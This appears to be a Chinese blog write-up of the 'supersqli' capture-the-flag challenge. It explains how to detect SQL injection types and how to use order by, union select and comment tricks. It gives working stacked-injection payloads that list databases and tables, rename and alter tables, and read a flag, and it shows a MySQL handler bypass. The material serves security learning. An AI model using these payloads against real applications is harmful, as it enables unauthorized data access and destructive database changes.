supersqli(SQL注入流程及常用SQL语句)
目录
一、SQL注入知识学习
1、判断注入类型
(1)数字型注入判断
(2)字符型注入判断
2、猜解sql查询语句中的字段数(order by 的使用)
3、判断显示位爆数据库的名字
4、注释(--+的使用)
5、堆叠注入
6、handler语句及用法
二、基于上述知识对此题的分析与解答
1、基本分析(注入点、注入类型等)
2、判断列数
3、利用or 1=1暴露表中数据
4、尝试联合查询
5、尝试堆叠注入
(1)看数据库
(2)查表名
(3)查询表中的列
6、处理被过滤
7、handler的使用
8、hackbar的使用
一、SQL注入知识学习
1、判断注入类型
数字型或者字符型,字符型的变量使用了引号,而数字型没有。
(1)数字型注入判断
常用语句:
1 and 1=1
1 and 1=2
假设注入类型为数字型,注入点为id,分别输入上面的语句,那么第一行测试语句会返回id为1的查询结果,而第二行语句由于条件and 1=2不成立,所以查询结果为空。如果注入类型为字符型,将上面语句拼接到sql中,由于id的值都不匹配,所以应该是都不返回任何结果,但是如果id本身是int类型,实际查询过程中是会返回结果的,这可能是因为对输入的字符进行了截断并转换了类型,造成1 and 1=2在字符类型中会返回id为1的查询结果。当然如果第二个语句返回了结果,我们也可以以此判断出该注入类型是字符型。
若两次返回结果一样,则为字符型注入。
(2)字符型注入判断
1' and '1'='1
1' and '1'='2
对于字符型注入判断,我们也可以这样进行操作,如上面的两条注入语句所示,如果是在数字型注入中,由于变量没有加引号,所以拼接后sql语法错误,直接报错,这和不回显信息是有区别。因此如果上面的语句注入后提示sql语法错误,那么我们可以直接判断测试对象为数字型注入。而对于字符型注入,第一行语句输入后和原本的引号前后完全闭合,且逻辑成立,所以回显出id为1的数据;第二行语句输入后,前后引号也完全闭合,但逻辑不成立,所以返回结果为空。
逻辑成立正常回显,逻辑不成立返回为空,类型错误直接报错。
2、猜解sql查询语句中的字段数(order by 的使用)
使用order by判断当前表的字段个数
例:?id=1 order by n --+
若n超过当前表的列数,就会报错,说明表中只有n-1列
假设为字符型注入,先利用1'实现引号闭环,再利用or 1=1这样可以暴露出表中所有的数据,最后利用order by num#去看是否报错来明确查询语句中的字段数,其中#号用于截断sql查询语句。
1' or 1=1 order by 1 #
1' or 1=1 order by 2 #
......
当然也可以采用1' or 1=1 union select 1, 2, 3 #的方式
3、判断显示位爆数据库的名字
判断显示位时,要使用 ?id=-1 或者改为0 让前面的select语句查询为空错误,然后采用后面的select语句去查询:
?id=-1' union select 1,2,3 --+
观察页面在哪里回显我们的输入,就可以用那个地方测试接下的语句
爆数据库的名字:
?id=1' union select 1,database(),3 --+
在之前回显2的地方会回显database数据库的名字
4、注释(--+的使用)
当输入参数为字符串时,称为字符型注入,它与数字型的区别:数字型不需要单引号来闭合,而字符串需要单引号来闭合。
例:https://blog.csdn.net/aboutus.php?id=1’
此时后台语句:$sql="SELECT 123 FROM abc WHERE id='1''"
此时多出了一个单引号,破坏了原本的SQL语句结构,数据库无法处理,于是会报错,证明这条语句成功被带进数据库查询,存在字符型注入。
此时通过 --+把后面的单引号注释掉,SQL语句也会形成闭合。
所以我们可以这样:
?id = 1' 攻击语句 --+
传入页面就变成了
select user from database where id = '1'攻击语句 – '
–+起注释作用,将后面的语句注释掉,在url中+相当于空格,–是注释符号,单行注释,之所以要加+号是因为–与单引号连在一起无法起注释作用因此必须把它们隔开。
5、堆叠注入
在SQL中,分号(;)是用来表示一条sql语句的结束。我们在 ; 结束一个sql语句后继续构造下一条语句,就成了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间的区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制。
可注入条件:
目标存在sql注入漏洞;
目标未对";"号进行过滤;
目标中间层查询数据库信息时可同时执行多条sql语句。
6、handler语句及用法
handler是mysql的专用语句,没有包含到SQL标准中,但它每次只能查询1次记录,而select可以根据需要返回多条查询结果。
hander `表名` open; // 打开一个表
handler`表名`read frist; // 查询第一个数据
handler`表名`read next; // 查询之后的数据直到最后一个数据返回空
二、基于上述知识对此题的分析与解答
注:以下sql语句都是直接在查询框中使用,并不是直接加在URL后面或者用在其地方。
1、基本分析(注入点、注入类型等)
打开链接,有一个提交查询框,以及题目的提示,这就是考的SQL注入
默认框里面有一个1,我们直接查询,输入1,页面正常返回,从返回中我们得到注入点是inject。
输入1'页面报错了
加上注释符号#或者--+或者%23(注释掉后面语句,使1后面的单引号与前面的单引号成功匹配就不会报错)页面回显正常,那么闭合符号就是单引号。
我们再来判断注入类型
1 and 1=1 1 and 1=2
查询1 and 1=1 和1 and 1=2,发现两次提交后页面一样,可以判断出为字符型注入漏洞;
1' and '1'='1
1' and '1'='2
两次都没有报错,且第二次返回结果为空,说明是字符型注入。
2、判断列数
1' order by 2# // 回显正常
1' order by 3# // 会报错
3、利用or 1=1暴露表中数据
1' or 1=1 order by 1 #
1' or 1=1 order by 2 #
(同样在3的时候会报错,说明只有两列)
4、尝试联合查询
1' union select 1,2#
发现过滤了很多函数 ,select不能用
5、尝试堆叠注入
(即在;后继续加sql语句)
(1)看数据库
1'; show databases;#
(2)查表名
1'; show tables;#
(3)查询表中的列
-1'; show columns from `words`;#
-1'; show columns from `1919810931114514`;#
这里查询表中的列,表名需要使用反单引号引起来,在windows系统下,反单引号(`)是数据库、表、索引、列和别名的引用符。
6、处理被过滤
但问题来了,虽然我们已经找到flag了,但是select被过滤了,而show命令又不能查看值。但过滤中并没有alert 和 rename,我们已经知道了words是用来回显内容的,我们把1919810931114514这个表更改名字为words,并增加相应的字段,使之回显原1919810931114514这个表的内容。1';rename table `words` to `words1`;rename table `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100) ;show columns from words;#
用1'or '1'='1访问,即可得到flag
7、handler的使用
后面改表名的步骤也可替换为用handler语句去解决,即:
1';
handler`1919810931114514`open as`a`;
handler`a`read next;
当然不改表名也是可以的,我们打开有flag的这个表并查询它,即:
1';
handler`1919810931114514` open;
handler`1919810931114514`read next;
(一定要先打开这个表,直接查询是不行的,handler`1919810931114514` open;不能省掉)
8、hackbar的使用
除了在查询框中执行这些sql语句,我们也可以使用hackbar来实现:
load URL后,在框里编写好我们的sql语句,点击Execute即可。
supersqli(SQL注入流程及常用SQL语句)相关推荐
- 【SQL注入漏洞-01】SQL注入漏洞原理及分类
SQL注入简介 结构化查询语言(Structured Query Language,缩写︰SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言. SQL注入(SQL Injection)是一 ...
- sql注入及mybatis防止sql注入
一.Sql 注入漏洞详解 Sql 注入产生原因及威胁: 当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行 Sql 语句.这种网站内部直接发送的Sql ...
- MySQL编码转换防止SQL注入_node-mysql中防止SQL注入
为了防止SQL注入,可以将SQL中传入参数进行编码,而不是直接进行字符串拼接.在node-mysql中,防止SQL注入的常用方法有以下四种: 方法一:使用escape()对传入参数进行编码: 参数编码 ...
- php 预处理 防注入,PHP防止sql注入小技巧之sql预处理原理与实现方法分析
本文实例讲述了PHP防止sql注入小技巧之sql预处理原理与实现方法.分享给大家供大家参考,具体如下: 我们可以把sql预处理看作是想要运行的 SQL 的一种编译过的模板,它可以使用变量参数进行定制. ...
- SQL注入-01-什么是SQL注入?
什么是SQL注入? 1.正常的web端口访问 正常访问是web传入程序设计者所希望的参数值,由程序查询数据库完成处理后,呈现结果页面给用户. 2.SQL注入是如何访问? (1)SQL注入也是正常的we ...
- java开发中推荐的防御sql注入方法_防御SQL注入的方法总结
SQL 注入是一类危害极大的攻击形式.虽然危害很大,但是防御却远远没有XSS那么困难. SQL 注入漏洞存在的原因,就是拼接 SQL 参数.也就是将用于输入的查询参数,直接拼接在 SQL 语句中,导致 ...
- java sql注入 正则表达式_Java防止SQL注入(转)
一.SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库. 二.SQL注入攻击的总体 ...
- SQL注入原理及预防SQL注入的方法
网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,担心网上的信息以及个人隐私遭到泄露.下面要为大家介绍的是SQL注入,对于sql注入,相信程序员都知道或者使用过,如果没有了解或完全没有听 ...
- 再谈SQL注入入侵动网SQL版
再谈SQL注入入侵动网SQL版 编辑前言: 这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞.说到底和动网没有什么关系,但因 ...
最新文章
- XtraGrid GridView设置默认选中的行颜色
- idea使用leecode插件
- 【C语言应用实例】输出当月日历
- pdfbox 第一页加内容_你用代码做过哪些很酷/有趣的事?
- mysql left join 索引失效_MySQL索引列上做操作导致索引失效案例分析
- 神奇的python(二)之python打包成应用程序
- 为啥这个月流量,感觉跑得特别快
- php基于纯真IP数据库实现IP地址信息查询
- vue清除地址栏参数
- 网格计算, 云计算, 集群计算, 分布式计算, 超级计算
- #6.3四维理论的数学模式
- 【CF1056D】Decorate Apple Tree
- mysql分组取最新
- curse库的使用总结
- 苹果Mac如何优化电池续航能力?
- MySQL中的表中增加删除字段
- python拟合非线性模型_python-绘制分段拟合到非线性数据
- BJFU_数据结构习题_241双栈的基本操作
- 亚马逊美国风扇ul507标准解析
- cocos2dx3.X shader使图片置灰